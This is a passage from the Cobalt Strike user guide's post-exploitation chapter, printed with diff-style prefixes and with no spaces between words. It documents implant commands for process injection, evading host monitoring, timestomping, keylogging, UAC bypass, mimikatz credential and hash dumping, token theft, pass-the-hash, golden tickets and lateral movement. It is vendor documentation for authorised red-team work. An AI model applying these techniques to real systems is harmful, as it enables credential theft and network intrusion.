+BeaconconsoletoswitchtheworkingdirectoryoftheBeacon’sprocess.Thepwd command
+willtellyouwhichdirectoryyou’recurrentlyworkingfrom.
+Thesetenv commandwillsetanenvironmentvariable.
+BeaconcanexecuteBeaconObjectFileswithoutcreatinganewprocess.BeaconObjectFiles
+arecompiledCprograms,writtentoaspecificconvention,thatrunwithinaBeaconsession.
+Useinline-execute [args] toexecuteaBeaconObjectFilewiththespecifiedarguments.See
+Beacon Object Files on page 171formoreinformation.
+Session Passing
+CobaltStrike’sBeaconstartedoutasastablelifelinetokeepaccesstoacompromisedhost.
+Fromdayone,Beacon’sprimarypurposewastopassaccessestootherCobaltStrikelisteners.
+Usethespawn commandtospawnasessionforalistener.Thespawncommandacceptsan
+architecture(e.g.,x86,x64)andalistenerasitsarguments.
+Bydefault,thespawn commandwillspawnasessioninrundll32.exe.Analertadministrator
+mayfinditstrangethatrundll32.exeisperiodicallymakingconnectionstotheinternet.Finda
+betterprogram(e.g.,InternetExplorer)andusethespawnto commandtostatewhichprogram
+Beaconshouldspawnforitssessions.
+Thespawnto commandrequiresyoutospecifyanarchitecture(x86orx64)andafullpathtoa
+programtospawn,asneeded.Typespawnto byitselfandpressentertoinstructBeacontogo
+backtoitsdefaultbehavior.
+Typeinject followedbyaprocessidandalistenernametoinjectasessionintoaspecific
+process.Useps togetalistofprocessesonthecurrentsystem.Useinject [pid] x64 toinjecta
+64-bitBeaconintoanx64process.
+Thespawnandinjectcommandsbothinjectapayloadstageintomemory.Ifthepayloadstage
+isanHTTP,HTTPS,orDNSBeaconanditcan’treachyou—youwillnotseeasession.Ifthe
+payloadstageisabindTCPorSMBBeacon,thesecommandswillautomaticallytrytolinkto
+andassumecontrolofthesepayloads.
+Usedllinject [pid] toinjectaReflectiveDLLintoaprocess.
+Usetheshinject [pid] [architecture] [/path/to/file.bin] commandtoinjectshellcode,froma
+localfile,intoaprocessontarget.Useshspawn [architecture] [/path/to/file.bin] tospawnthe
+“spawnto”processandinjectthespecifiedshellcodefileintothatprocess.
+Usedllload [pid] [c:\path\to\file.dll] toloadanon-diskDLLinanotherprocess.
+CobaltStrikeUserGuide www.fortra.com page:96
+
+PostExploitation/AlternateParentProcesses
+Alternate Parent Processes
+Useppid [pid] toassignanalternateparentprocessforprogramsrunbyyourBeaconsession.
+Thisisameanstomakeyouractivityblendinwithnormalactionsonthetarget.Thecurrent
+Beaconsessionmusthaverightstothealternateparentandit’sbestifthealternateparent
+processexistsinthesamedesktopsessionasyourBeacon.Typeppid,withnoarguments,to
+haveBeaconlaunchprocesseswithnospoofedparent.
+Therunu commandwillexecuteacommandwithanotherprocessastheparent.This
+commandwillrunwiththerightsanddesktopsessionofitsalternateparentprocess.The
+currentBeaconsessionmusthavefullrightstothealternateparent.Thespawnu commandwill
+spawnatemporaryprocess,asachildofaspecifiedprocess,andinjectaBeaconpayload
+stageintoit.
+Thespawntovaluecontrolswhichprogramisusedasatemporaryprocess.
+Spoof Process Arguments
+EachBeaconhasaninternallistofcommandsitshouldspoofargumentsfor.WhenBeacon
+runsacommandthatmatchesalist,Beacon:
+1. Startsthematchedprocessinasuspendedstate(withthefakearguments)
+2. Updatestheprocessmemorywiththerealarguments
+3. Resumestheprocess
+Theeffectisthathostinstrumentationrecordingaprocesslaunchwillseethefakearguments.
+Thishelpsmaskyourrealactivity.
+Useargue [command] [fake arguments] toaddacommandtothisinternallist.The
+[command]portionmaycontainanenvironmentvariable.Useargue [command] toremovea
+commandfromthisinternallist.argue,byitself,liststhecommandsinthisinternallist.
+Theprocessmatchlogicisexact.IfBeacontriestolaunch“net.exe”,itwillnotmatchnet,
+NET.EXE,orc:\windows\system32\net.exefromitsinternallist.Itwillonlymatchnet.exe.
+x86Beaconcanonlyspoofargumentsinx86childprocesses.Likewise,x64Beaconcanonly
+spoofargumentsinx64childprocesses.
+Therealargumentsarewrittentothememoryspacethatholdsthefakearguments.Ifthereal
+argumentsarelongerthanthefakearguments,thecommandlaunchwillfail.
+Blocking DLLs in Child Processes
+CobaltStrikeUserGuide www.fortra.com page:97
+
+PostExploitation/UploadandDownloadFiles
+Useblockdlls start toaskBeacontolaunchchildprocesseswithabinarysignaturepolicythat
+blocksnon-MicrosoftDLLsfromtheprocessspace.Useblockdlls stop todisablethisbehavior.
+ThisfeaturerequiresWindows10.
+Upload and Download Files
+download-Thiscommanddownloadstherequestedfile.Youdonotneedtoprovidequotes
+aroundafilenamewithspacesinit.Beaconisbuiltforlowandslowexfiltrationofdata.
+Duringeachcheck-in,Beaconwilldownloadafixedchunkofeachfileitstaskedtoget.
+ThesizeofthischunkdependsonBeacon’scurrentdatachannel.TheHTTPandHTTPS
+channelspulldatain512KBchunks.
+downloads-UsetoseealistoffiledownloadsinprogressforthecurrentBeacon.
+cancel-Issuethiscommand,followedbyafilename,tocanceladownloadthat’sinprogress.
+Youmayusewildcardswithyourcancelcommandtocancelmultiplefiledownloadsat
+once.
+upload-Thiscommanduploadsafiletothehost.
+timestomp-Whenyouuploadafile,youwillsometimeswanttoupdateitstimestampsto
+makeitblendinwithotherfilesinthesamefolder.Thiscommandwilldothis.The
+timestompcommandmatchestheModified,Accessed,andCreatedtimesofonefileto
+anotherfile.
+GotoView->DownloadsinCobaltStriketoseethefilesthatyourteamhasdownloadedsofar.
+Onlycompleteddownloadsshowupinthistab.
+Downloadedfilesarestoredontheteamserver.Tobringfilesbacktoyoursystem,highlight
+themhere,andpressSync Files.CobaltStrikethendownloadstheselectedfilestoafolderof
+yourchoosingonyoursystem.
+File Browser
+Beacon’sFileBrowserisanopportunitytoexplorethefilesonacompromisedsystem.Goto
+[Beacon] ->Explore ->File Browser toopenit.
+Youcanalsoissuethecommand,file_browser,toopenthefilebrowsertabstartinginthe
+currentdirectory.
+ThefilebrowserwillrequestalistingforthecurrentworkingdirectoryofBeacon.Whenthis
+resultarrives,thefilebrowserwillpopulate.
+CobaltStrikeUserGuide www.fortra.com page:98
+
+PostExploitation/TheWindowsRegistry
+Theleft-handsideofthefilebrowserisatreewhichorganizestheknowndrivesandfoldersinto
+oneview.Theright-handsideofthefilebrowsershowsthecontentsofthecurrentfolder.
+figure55-FileBrowser
+Eachfilebrowsercachesthefolderlistingsitreceives.Acoloredfolderindicatesthefolder’s
+contentsareinthisfilebrowser’scache.Youmaynavigatetocachedfolderswithoutgenerating
+anewfilelistingrequest.PressRefresh toaskBeacontoupdatethecontentsofthecurrent
+folder.
+Adark-greyfoldermeansthefolder’scontentsarenotinthisfilebrowser’scache.Clickona
+folderinthetreetohaveBeacongenerateatasktolistthecontentsofthisfolder(andupdateits
+cache).Double-clickonadark-greyfolderintheright-handsidecurrentfolderviewtodothe
+same.
+Togoupafolder,pressthefolderbuttonnexttothefilepathabovetheright-handsidefolder
+detailsview.Iftheparentfolderisinthisfilebrowser’scache,youwillseetheresults
+immediately.Iftheparentfolderisnotinthefilebrowser’scache,thebrowserwillgeneratea
+tasktolistthecontentsoftheparentfolder.
+Right-clickafiletodownloadordeleteit.
+Toseewhichdrivesareavailable,pressList Drives.
+File System Commands
+YoumayprefertobrowseandmanipulatethefilesystemfromtheBeaconconsole.
+Usethels commandtolistfilesinthecurrentdirectory.Usemkdir tomakeadirectory.rm will
+removeafileorfolder.cp copiesafiletoadestination.mv movesafile.
+The Windows Registry
+CobaltStrikeUserGuide www.fortra.com page:99
+
+PostExploitation/KeystrokesandScreenshots
+Usereg_query [x86|x64] [HIVE\path\to\key] toqueryaspecifickeyintheregistry.This
+commandwillprintthevalueswithinthatkeyandalistofanysubkeys.Thex86/x64optionis
+requiredandforcesBeacontousetheWOW64(x86)ornativeviewoftheregistry.reg_query
+[x86|x64] [HIVE\path\to\key] [value] willqueryaspecificvaluewithinaregistrykey.
+Keystrokes and Screenshots
+Beacon’stoolstologkeystrokesandtakescreenshotsaredesignedtoinjectintoanother
+processandreporttheirresultstoyourBeacon.
+Tostartthekeystrokelogger,usekeylogger pid x86 toinjectintoanx86process.Use
+keylogger pid x64 toinjectintoanx64process.Usekeylogger byitselftoinjectthekeystroke
+loggerintoatemporaryprocess.Thekeystrokeloggerwillmonitorkeystrokesfromtheinjected
+processandreportthemtoBeaconuntiltheprocessterminatesoryoukillthekeystrokelogger
+post-exploitationjob.
+Beawarethatmultiplekeystrokeloggersmayconflictwitheachother.Useonlyonekeystroke
+loggerperdesktopsession.
+Totakeascreenshot,usescreenshot pid x86 toinjectthescreenshottoolintoanx86process.
+Usescreenshot pid x64 toinjectintoanx64process.Thisvariantofthescreenshotcommand
+willtakeonescreenshotandexit.screenshot,byitself,willinjectthescreenshottoolintoa
+temporaryprocess.
+Thescreenwatch command(withoptionstouseatemporaryprocessorinjectintoanexplicit
+process)willcontinuouslytakescreenshotsuntilyoustopthescreenwatchpost-exploitation
+job.
+Usetheprintscreen command(alsowithtemporaryprocessandinjectoptions)totakea
+screenshotbyadifferentmethod.ThiscommandusesaPrintScrkeypresstoplacethe
+screenshotontotheuser'sclipboard.Thisfeaturerecoversthescreenshotfromtheclipboard
+andreportsitbacktoyou.
+WhenBeaconreceivesnewscreenshotsorkeystrokes,itwillpostamessagetotheBeacon
+console.ThescreenshotandkeystrokeinformationisnotavailablethroughtheBeaconconsole
+though.GotoView ->Keystrokes toseeloggedkeystrokesacrossallofyourBeaconsessions.
+GotoView ->Screenshots tobrowsethroughscreenshotsfromallofyourBeaconsessions.
+Bothofthesedialogsupdateasnewinformationcomesin.Thesedialogsmakeiteasyforone
+operatortomonitorkeystrokesandscreenshotsonallofyourBeaconsessions.
+Controlling Beacon Jobs
+CobaltStrikeUserGuide www.fortra.com page:100
+
+PostExploitation/TheProcessBrowser
+SeveralBeaconfeaturesrunasjobsinanotherprocess(e.g.,thekeystrokeloggerand
+screenshottool).Thesejobsruninthebackgroundandreporttheiroutputwhenit’savailable.
+Usethejobs commandtoseewhichjobsarerunninginyourBeacon.Usejobkill [job number]
+tokillajob.
+The Process Browser
+TheProcessBrowserdoestheobvious;ittasksaBeacontoshowalistofprocessesandshows
+thisinformationtoyou.Goto[beacon] -> Explore -> Show ProcessestoopentheProcess
+Browser.
+Youcanalsoissuethecommand,process_browser,toopentheprocessbrowsertabstarting
+inthecurrentdirectory.
+figure56-ProcessBrowser
+Theleft-handsideshowstheprocessesorganizedintoatree.Thecurrentprocessforyour
+Beaconishighlightedyellow.
+Theright-handsideshowstheprocessdetails.TheProcessBrowserisalsoaconvenientplace
+toimpersonateatokenfromanotherprocess,deploythescreenshottool,ordeploythe
+keystrokelogger.
+Highlightoneormoreprocessesandpresstheappropriatebuttonatthebottomofthetab.
+IfyouhighlightmultipleBeaconsandtaskthemtoshowprocesses,CobaltStrikewillshowa
+ProcessBrowserthatalsostateswhichhosttheprocesscomesfrom.Thisvariantofthe
+ProcessBrowserisaconvenientwaytodeployBeacon’spost-exploitationtoolstomultiple
+systemsatonce.
+CobaltStrikeUserGuide www.fortra.com page:101
+
+PostExploitation/DesktopControl
+Simplysortbyprocessname,highlighttheinterestingprocessesonyourtargetsystems,and
+presstheScreenshotorLog Keystrokesbuttontodeploythesetoolstoallhighlighted
+systems.
+Desktop Control
+Tointeractwithadesktoponatargethost,goto[beacon] -> Explore -> Desktop (VNC).This
+willstageaVNCserverintothememoryofthecurrentprocessandtunneltheconnection
+throughBeacon.
+WhentheVNCserverisready,CobaltStrikewillopenatablabeledDesktop HOST@PID.
+YoumayalsouseBeacon’sdesktop commandtoinjectaVNCserverintoaspecificprocess.
+Usedesktop pid architecture low|high.Thelastparameterlet’syouspecifyaqualityforthe
+VNCsession.
+figure57-CobaltStrikeDesktopViewer
+Thebottomofthedesktoptabhasseveralbuttons.Theseare:
+Refreshthescreen
+Viewonly
+DecreaseZoom
+IncreaseZoom
+CobaltStrikeUserGuide www.fortra.com page:102
+
+PostExploitation/PrivilegeEscalation
+Zoomto100%
+AdjustZoomtoFit
+Tab
+SendCtrl+Escape
+LocktheCtrlkey
+LocktheAltkey
+Ifyoucan’ttypeinaDesktoptab,checkthestateoftheCtrl andAlt buttons.Wheneitherbutton
+ispressed,allofyourkeystrokesaresentwiththeCtrlorAltmodifier.PresstheCtrl orAlt
+buttontoturnoffthisbehavior.MakesureView only isn’tpressedeither.Topreventyoufrom
+accidentallymovingthemouse, View only ispressedbydefault.
+Privilege Escalation
+Somepost-exploitationcommandsrequiresystemadministrator-levelrights.Beaconincludes
+severaloptionstohelpyouelevateyouraccessincludingthefollowing:
+NOTE:
+Typehelp intheBeaconconsoletoseeavailablecommands.Typehelp followedbya
+commandnametoseedetailedhelp.
+Elevate with an Exploit
+elevate-ThiscommandlistsprivilegeescalationexploitsregisteredwithCobaltStrike.
+elevate [exploit] [listener]-Thiscommandattemptstoelevatewithaspecificexploit.
+CobaltStrikeUserGuide www.fortra.com page:103
+
+PostExploitation/PrivilegeEscalation
+Youmayalsolaunchoneoftheseexploitsthrough[beacon] ->Access ->Elevate.
+Choosealistener,selectanexploit,andpressLaunchtoruntheexploit.Thisdialogisa
+front-endforBeacon'selevatecommand.
+figure58-Elevate
+YoumayaddprivilegeescalationexploitstoCobaltStrikethroughtheElevateKit.The
+ElevateKitisanAggressorScriptthatintegratesseveralopensourceprivilegeescalation
+exploitsintoCobaltStrike.https://github.com/rsmudge/ElevateKit.
+runasadmin-Thiscommandbyitself,listscommandelevatorexploitsregisteredwithCobalt
+Strike.
+runasadmin [exploit] [command + args]-Thiscommandattemptstorunthespecified
+commandinanelevatedcontext.
+CobaltStrikeseparatescommandelevatorexploitsandsession-yieldingexploitsbecausesome
+attacksareanaturalopportunitytospawnasession.Otherattacksyielda“runthiscommand”
+primitive.Spawningasessionfroma“runthiscommand”primitiveputsalotofweaponization
+decisions(notalwaysfavorable)inthehandsofyourtooldeveloper.Withrunasadmin,it’syour
+choicetodropanexecutabletodiskandrunit,torunaPowerShellone-liner,ortoweakenthe
+targetinsomeway.
+Ifyou’dliketouseaPowerShellone-linertospawnasession,goto[beacon] ->Access ->One-
+liner.
+CobaltStrikeUserGuide www.fortra.com page:104
+
+PostExploitation/PrivilegeEscalation
+figure59-PowerShellOne-liner
+Thisdialogwillsetupalocalhost-onlywebserverwithinyourBeaconsessiontohostapayload
+stageandreturnaPowerShellcommandtodownloadandrunthispayloadstage.
+Thiswebserverisone-useonly.Onceit’sconnectedtoonce,itwillcleanitselfupandstop
+servingyourpayload.
+IfyourunaTCPorSMBBeaconwiththistool,youwillneedtouseconnectorlinktoassume
+controlofthepayloadmanually.Also,beawarethatifyoutrytouseanx64payload—thiswillfail
+ifthex86PowerShellisinyour$PATH.
+CobaltStrikedoesnothavemanybuilt-inelevateoptions.Exploitdevelopmentisnotafocusof
+theworkatFortra.ItiseasytointegrateprivilegeescalationexploitsviaCobaltStrike’s
+AggressorScriptprogramminglanguagethough.Toseewhatthislookslike,downloadthe
+ElevateKit(https://github.com/cobalt-strike/ElevateKit).TheElevateKitisanAggressorScript
+thatintegratesseveralopensourceprivilegeescalationexploitsintoCobaltStrike.
+Elevate with Known Credentials
+runas [DOMAIN\user] [password] [command]-Thisrunsacommandasanotheruserusing
+theircredentials.Therunascommandwillnotreturnanyoutput.Youmayuserunasfrom
+anon-privilegedcontextthough.
+spawnas [DOMAIN\user] [password] [listener]-Thiscommandspawnsasessionasanother
+userusingtheircredentials.Thiscommandspawnsatemporaryprocessandinjectsyour
+payloadstageintoit.
+Youmayalsogoto[beacon] ->Access ->Spawn As torunthiscommandaswell.
+Withbothofthesecommands,beawarethatcredentialsforanon-SID500accountwillspawn
+apayloadinamediumintegritycontext.YouwillneedtouseBypassUACtoelevatetoahigh
+CobaltStrikeUserGuide www.fortra.com page:105
+
+PostExploitation/PrivilegeEscalation
+integritycontext.Also,beaware,thatyoushouldrunthesecommandsfromaworkingfolder
+thatthespecifiedaccountcanread.
+Get SYSTEM
+getsystem-ThiscommandimpersonatesatokenfortheSYSTEMaccount.Thislevelof
+accessmayallowyoutoperformprivilegedactionsthatarenotpossibleasan
+Administratoruser.
+AnotherwaytogetSYSTEMistocreateaservicethatrunsapayload.Theelevate svc-exe
+[listener] commanddoesthis.Itwilldropanexecutablethatrunsapayload,createaserviceto
+runit,assumecontrolofthepayload,andcleanuptheserviceandexecutable.
+UAC Bypass
+MicrosoftintroducedUserAccountControl(UAC)inWindowsVistaandrefineditinWindows7.
+UACworksalotlikesudoinUNIX.Day-to-dayauserworkswithnormalprivileges.Whenthe
+userneedstoperformaprivilegedaction—thesystemasksiftheywouldliketoelevatetheir
+rights.
+CobaltStrikeshipswithafewUACbypassattacks.Theseattackswillnotworkifthecurrent
+userisnotanAdministrator.TocheckifthecurrentuserisintheAdministratorsgroup,userun
+whoami /groups.
+elevate uac-token-duplication [listener]-Thiscommandspawnsatemporaryprocesswith
+elevatedrightsandinjectapayloadstageintoit.ThisattackusesaUAC-loopholethat
+allowsanon-elevatedprocesstolaunchanarbitraryprocesswithatokenstolenfroman
+elevatedprocess.Thisloopholerequirestheattacktoremoveseveralrightsassignedto
+theelevatedtoken.Theabilitiesofyournewsessionwillreflecttheserestrictedrights.If
+AlwaysNotifyisatitshighestsetting,thisattackrequiresthatanelevatedprocessis
+alreadyrunninginthecurrentdesktopsession(asthesameuser).Thisattackworkson
+Windows7andWindows10priortotheNovember2018update.
+runasadmin uac-token-duplication [command]-Thisisthesameattackdescribedabove,but
+thisvariantrunsacommandofyourchoosinginanelevatedcontext.
+runasadmin uac-cmstplua [command]-ThiscommandattemptatobypassUACandruna
+commandinanelevatedcontext.ThisattackreliesonaCOMobjectthatautomatically
+elevatesfromcertainprocesscontexts(Microsoftsigned,livesinc:\windows\*).
+Privileges
+getprivs-Thiscommandenablestheprivilegesassignedtoyourcurrentaccesstoken.
+CobaltStrikeUserGuide www.fortra.com page:106
+
+PostExploitation/Mimikatz
+Mimikatz
+Beaconintegratesmimikatz.Usemimikatz [pid] [arch] [module::command] toinject
+intothespecifiedprocesstorunamimikatzcommand.Usemimikatz(without[pid]and[arch]
+arguments)tospawnatemporaryprocesstorunamimikatzcommand.
+SomemimikatzcommandsmustrunasSYSTEMtowork.Prefixacommandwithan
+exclamtion( !)toforcemimikatztoelevatetoSYSTEMbeforeitrunsyourcommand.For
+example,mimikatz!lsa::cache willrecoversaltedpasswordhashescachedbythesystem.Use
+mimikatz [pid] [arch] [!module::command] ormimikatz [!module::command]
+(without[pid]and[arch]arguments).
+IfyouneedtorunamimikatzcommandwithBeacon’scurrentaccesstoken,youcanprefixa
+commandwitha@toforcemimikatztoimpersonateBeacon’scurrentaccesstoken.For
+example,mimikatz @lsadump::dcsync willrunthedcsynccommandinmimikatzwith
+Beacon’scurrentaccesstoken.Usemimikatz [pid] [arch] [@module::command] or
+mimikatz [@module::command] (without[pid]and[arch]arguments).
+Ifyouwanttorunmultiplemimikatzcommandsinasinglecommand,usethesemicolon( ;)
+charactertoseparatemultiplemimikatzcommands.Themaximumlengthofthecommandsis
+511characters.Forexample,mimikatz crypto::capi ; crypto::certificates
+/systemstore:local_machine /store:my /export
+Credential and Hash Harvesting
+Todumphashes,goto[beacon] ->Access ->Dump Hashes.Youcanalsousethehashdump
+[pid] [x86|x64]commandfromtheBeaconconsoletoinjectthehashdumptoolintothe
+specifiedprocess.Usehashdump(without[pid]and[arch]arguments)tospawnatemporary
+processandinjectthehashdumptoolintoit.Thesecommandswillspawnajobthatinjectsinto
+LSASSanddumpsthepasswordhashesforlocalusersonthecurrentsystem.Thiscommand
+requiresadministratorprivileges.Ifinjectingintoapidthatprocessrequiresadministrator
+privileges.
+Uselogonpasswords [pid] [arch]toinjectintothespecifiedprocesstodumpplaintext
+credentialsandNTLMhashes.Uselogonpasswords(without[pid]and[arch]arguments)to
+spawnatemporaryprocesstodumpplaintextcredentialsandNTLMhashes.Thiscommand
+usesmimikatzandrequiresadministratorprivileges.
+Usedcsync [pid] [arch] [DOMAIN.fqdn] toinjectintothespecifiedprocessto
+extracttheNTLMpasswordhashes.Usedcsync [DOMAIN.fqdn] tospawna
+temporaryprocesstoextracttheNTLMpasswordhashes.Thiscommandusesmimikatzto
+extracttheNTLMpasswordhashfordomainusersfromthedomaincontroller.Specifyauser
+togettheirhashonly.Thiscommandrequiresadomainadministratortrustrelationship.
+CobaltStrikeUserGuide www.fortra.com page:107
+
+PostExploitation/PortScanning
+Usechromedump [pid] [arch]toinjectintothespecifiedprocesstorecovercredentialmaterial
+fromGoogleChrome.Usechromedump(without[pid]and[arch]arguments)tospawna
+temporaryprocesstorecovercredentialmaterialfromGoogleChrome.Thiscommandwilluse
+Mimikatztorecoverthecredentialmaterialandshouldberununderausercontext.
+CredentialsdumpedwiththeabovecommandsarecollectedbyCobaltStrikeandstoredinthe
+credentialsdatamodel.GotoView ->Credentials topullupthecredentialsonthecurrentteam
+server.
+Port Scanning
+Beaconhasabuiltinportscanner.Useportscan [pid] [arch] [targets] [ports] [arp|icmp|none]
+[max connections]toinjectintothespecifiedprocesstorunaportscanagainstthespecified
+hosts.Useportscan [targets] [ports] [arp|icmp|none] [max connections](without[pid]and
+[arch]arguments)tospawnatemporaryprocesstorunaportscanagainstthespecifiedhosts.
+The[targets]optionisacommaseparatedlistofhoststoscan.Youmayalso
+specifyIPv4addressranges(e.g.,192.168.1.128-192.168.2.240,192.168.1.0/24)
+The[ports]optionisacommaseparatedlistorportstoscan.Youmayspecifyport
+rangesaswell(e.g.,1-65535)
+The[arp|icmp|none]targetdiscoveryoptionsdictatehowtheportscanningtoolwill
+determineifahostisalive.TheARPoptionusesARPtoseeifasystemrespondsto
+thespecifiedaddress.TheICMPoptionsendsanICMPechorequest.Thenone
+optiontellstheportscantooltoassumeallhostsarealive.
+The[max connections]optionlimitshowmanyconnectionstheportscantoolwill
+attemptatanyonetime.TheportscantoolusesasynchronousI/Oandit'sableto
+handlealargenumberofconnectionsatonetime.Ahighervaluewillmakethe
+portscangomuchfaster.Thedefaultis1024.
+Theportscannerwillrun,inbetweenBeaconcheckins.Whenithasresultstoreport,itwillsend
+themtotheBeaconconsole.CobaltStrikewillprocessthisinformationandupdatethetargets
+modelwiththediscoveredhosts.
+Youcanalsogoto[beacon] -> Explore -> Port Scannertolaunchtheportscannertool.
+Network and Host Enumeration
+Beacon’snetmoduleprovidestoolstointerrogateanddiscovertargetsinaWindowsactive
+directorynetwork.
+CobaltStrikeUserGuide www.fortra.com page:108
+
+PostExploitation/TrustRelationships
+Usenet [pid] [arch] [command] [arguments]toinjectthenetworkandhostenumerationtool
+intothespecifiedprocess.Usenet [command] [arguments](without[pid]and[arch]
+arguments)tospawnatemporaryprocessandinjectthenetworkandhostenumerationtool
+intoit.Anexceptionisthenet domaincommandwhichisimplementedasaBOF.netdomain.
+ThecommandsinBeacon’snetmodulearebuiltontopoftheWindowsNetworkEnumeration
+APIs.Mostofthesecommandsaredirectreplacementsformanyofthebuilt-innetcommands
+inWindows(therearealsoafewuniquecapabilitieshereaswell).Thefollowingcommandsare
+available:
+computers-listshostsinadomain(groups)
+dclist-listsdomaincontrollers.(populatesthetargetsmodel)
+domain-displaydomainforthishost
+domain_controllers-listsDCsinadomain(groups)
+domain_trusts-listsdomaintrusts
+group-listsgroupsandusersingroups
+localgroup-listslocalgroupsandusersinlocalgroups.(greatduringlateralmovementwhen
+youhavetofindwhoisalocaladminonanothersystem).
+logons-listsusersloggedontoahost
+sessions-listssessionsonahost
+share-listssharesonahost
+user-listsusersanduserinformation
+time-showtimeforahost
+view-listshostsinadomain(browserservice).(populatesthetargetsmodel)
+Trust Relationships
+TheheartofWindowssinglesign-onistheaccesstoken.WhenauserlogsontoaWindows
+host,anaccesstokenisgenerated.Thistokencontainsinformationabouttheuserandtheir
+rights.Theaccesstokenalsoholdsinformationneededtoauthenticatethecurrentuserto
+anothersystemonthenetwork.ImpersonateorgenerateatokenandWindowswilluseits
+informationtoauthenticatetoanetworkresourceforyou.
+CobaltStrikeUserGuide www.fortra.com page:109
+
+PostExploitation/TrustRelationships
+Usesteal_token [pid]orsteal_token [pid] tostealan
+accesstokenfromanexistingprocess.
+Token Store
+Thetokenstorefacilitateshot-swappableaccesstokens.Usetoken-store steal [pid,...]
+tostealanaccesstokenandstoreit.Toimmediately
+applythestolentoken,usetoken-store steal-and-use [pid] .
+Thetoken-store showcommandliststheaccesstokenscurrentlyavailableinthetokenstore.
+Usetoken-store use [id]toapplyanaccesstokentothecurrentBeacon.
+token-store remove [id,...]andtoken-store remove-allcommandscanbeusedtoremove
+storedtokensfromthestore.
+Ifyou’dliketoseewhichprocessesarerunninguseps.Thegetuidcommandwillprintyour
+currenttoken.Userev2selftorevertbacktoyouroriginaltoken.
+OpenProcessTokenaccessmasksuggestedvalues:
+blank = default (TOKEN_ALL_ACCESS)
+0 = TOKEN_ALL_ACCESS
+11 = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY
+(1+2+8)
+Access mask values:
+STANDARD_RIGHTS_REQUIRED . . . . : 983040
+TOKEN_ASSIGN_PRIMARY . . . . . . : 1
+TOKEN_DUPLICATE . . . . . . . . : 2
+TOKEN_IMPERSONATE . . . . . . . : 4
+TOKEN_QUERY . . . . . . . . . . : 8
+TOKEN_QUERY_SOURCE . . . . . . . : 16
+TOKEN_ADJUST_PRIVILEGES . . . . : 32
+TOKEN_ADJUST_GROUPS . . . . . . : 64
+TOKEN_ADJUST_DEFAULT . . . . . . : 128
+TOKEN_ADJUST_SESSIONID . . . . . : 256
+NOTE:
+'OpenProcessTokenaccessmask'canbehelpfulforstealingtokensfromprocessesusing
+'SYSTEM'userandyouhavethiserror:Couldnotopenprocesstoken:{pid}(5)
+CobaltStrikeUserGuide www.fortra.com page:110
+
+PostExploitation/LateralMovement
+Youcansetyourpreferreddefaultwith'.steal_token_access_mask'intheMalleableC2global
+options.
+Ifyouknowcredentialsforauser;usemake_token [DOMAIN\user] [password]togeneratea
+tokenthatpassesthesecredentials.Thistokenisacopyofyourcurrenttokenwithmodified
+singlesign-oninformation.Itwillshowyourcurrentusername.Thisisexpectedbehavior.
+TheBeaconcommandpth [pid] [arch] [DOMAIN\user] [ntlm hash]injectsintothespecified
+processtogenerateANDimpersonateatoken.Usepth [DOMAIN\user] [ntlm hash](without
+[pid]and[arch]arguments)tospawnatemporaryprocesstogenerateANDimpersonatea
+token.ThiscommandusesmimikatztogenerateANDimpersonateatokenthatusesthe
+specifiedDOMAIN,user,andNTLMhashassinglesign-oncredentials.Beaconwillpassthis
+hashwhenyouinteractwithnetworkresources.
+Beacon’sMakeTokendialog([beacon]->Access->Make Token)isafront-endforthese
+commands.Itwillpresentthecontentsofthecredentialmodelanditwillusetheright
+commandtoturntheselectedcredentialentryintoanaccesstoken.
+Kerberos Tickets
+AGoldenTicketisaself-generatedKerberosticket.It'smostcommontoforgeaGoldenTicket
+withDomainAdministratorrights
+Goto[beacon]->Access->Golden TickettoforgeaGoldenTicketfromCobaltStrike.Provide
+thefollowingpiecesofinformationandCobaltStrikewillusemimikatztogenerateaticketand
+injectitintoyourkerberostray:
+1. Theuseryouwanttoforgeaticket.
+2. Thedomainyouwanttoforgeaticketfor.
+3. Thedomain'sSID
+4. TheNTLMhashofthekrbtgtuseronadomaincontroller.
+Usekerberos_ticket_use [/path/to/ticket]toinjectaKerberosticketintothecurrentsession.
+ThiswillallowBeacontointeractwithremotesystemsusingtherightsinthisticket.
+Usekerberos_ticket_purgetoclearanyKerberosticketsassociatedwithyoursession.
+Lateral Movement
+Onceyouhaveatokenforadomainadminoradomainuserwhoisalocaladminonatarget,
+youmayabusethistrustrelationshiptogetcontrolofthetarget.CobaltStrike’sBeaconhas
+severalbuilt-inoptionsforlateralmovement.
+CobaltStrikeUserGuide www.fortra.com page:111
+
+PostExploitation/LateralMovementGUI
+Typejump tolistlateralmovementoptionsregisteredwithCobaltStrike.Runjump [module]
+[target] [listener] toattempttorunapayloadonaremotetarget.
+Jump Module Arch Description
+psexec x86 UseaservicetorunaServiceEXEartifact
+psexec64 x64 UseaservicetorunaServiceEXEartifact
+psexec_psh x86 UseaservicetorunaPowerShellone-liner
+winrm x86 RunaPowerShellscriptviaWinRM
+winrm64 x64 RunaPowerShellscriptviaWinRM
+Runremote-exec,byitself,tolistremoteexecutionmodulesregisteredwithCobaltStrike.Use
+remote-exec [module] [target] [command + args] toattempttorunthespecifiedcommand
+onaremotetarget.
+Remote-exec Module Description
+psexec RemoteexecuteviaServiceControl
+Manager
+winrm RemoteexecuteviaWinRM
+(PowerShell)
+wmi RemoteexecuteviaWMI
+Lateralmovementisanarea,similartoprivilegeescalation,wheresomeattackspresenta
+naturalsetofprimitivestospawnasessiononaremotetarget.Someattacksgiveanexecute-
+primitiveonly.Thesplitbetweenjumpandremote-execgivesyouflexibilitytodecidehowto
+weaponizeanexecute-onlyprimitive.
+AggressorScripthasanAPItoaddnewmodulestojumpandremote-exec.SeetheAggressor
+Scriptdocumentation(theBeaconchapter,specifically)formoreinformation.
+Lateral Movement GUI
+CobaltStrikealsoprovidesaGUItomakelateralmovementeasier.SwitchtotheTargets
+VisualizationorgotoView ->Targets.Navigateto[target] ->Jump andchooseyourdesired
+lateralmovementoption.
+Thefollowingdialogwillopen:
+CobaltStrikeUserGuide www.fortra.com page:112
+
+PostExploitation/BeaconDataStore
+figure60-LateralMovementDialog
+Tousethisdialog:
+First,decidewhichtrustyouwanttouseforlateralmovement.Ifyouwanttousethetokenin
+oneofyourBeacons,checktheUsesession’scurrentaccesstokenbox.Ifyouwanttouse
+credentialsorhashesforlateralmovement—that’sOKtoo.Selectcredentialsfromthe
+credentialstoreorpopulatetheUser,Password,andDomainfields.Beaconwillusethis
+informationtogenerateanaccesstokenforyou.Keepinmind,youneedtooperatefromahigh
+integritycontext[administrator]forthistowork.
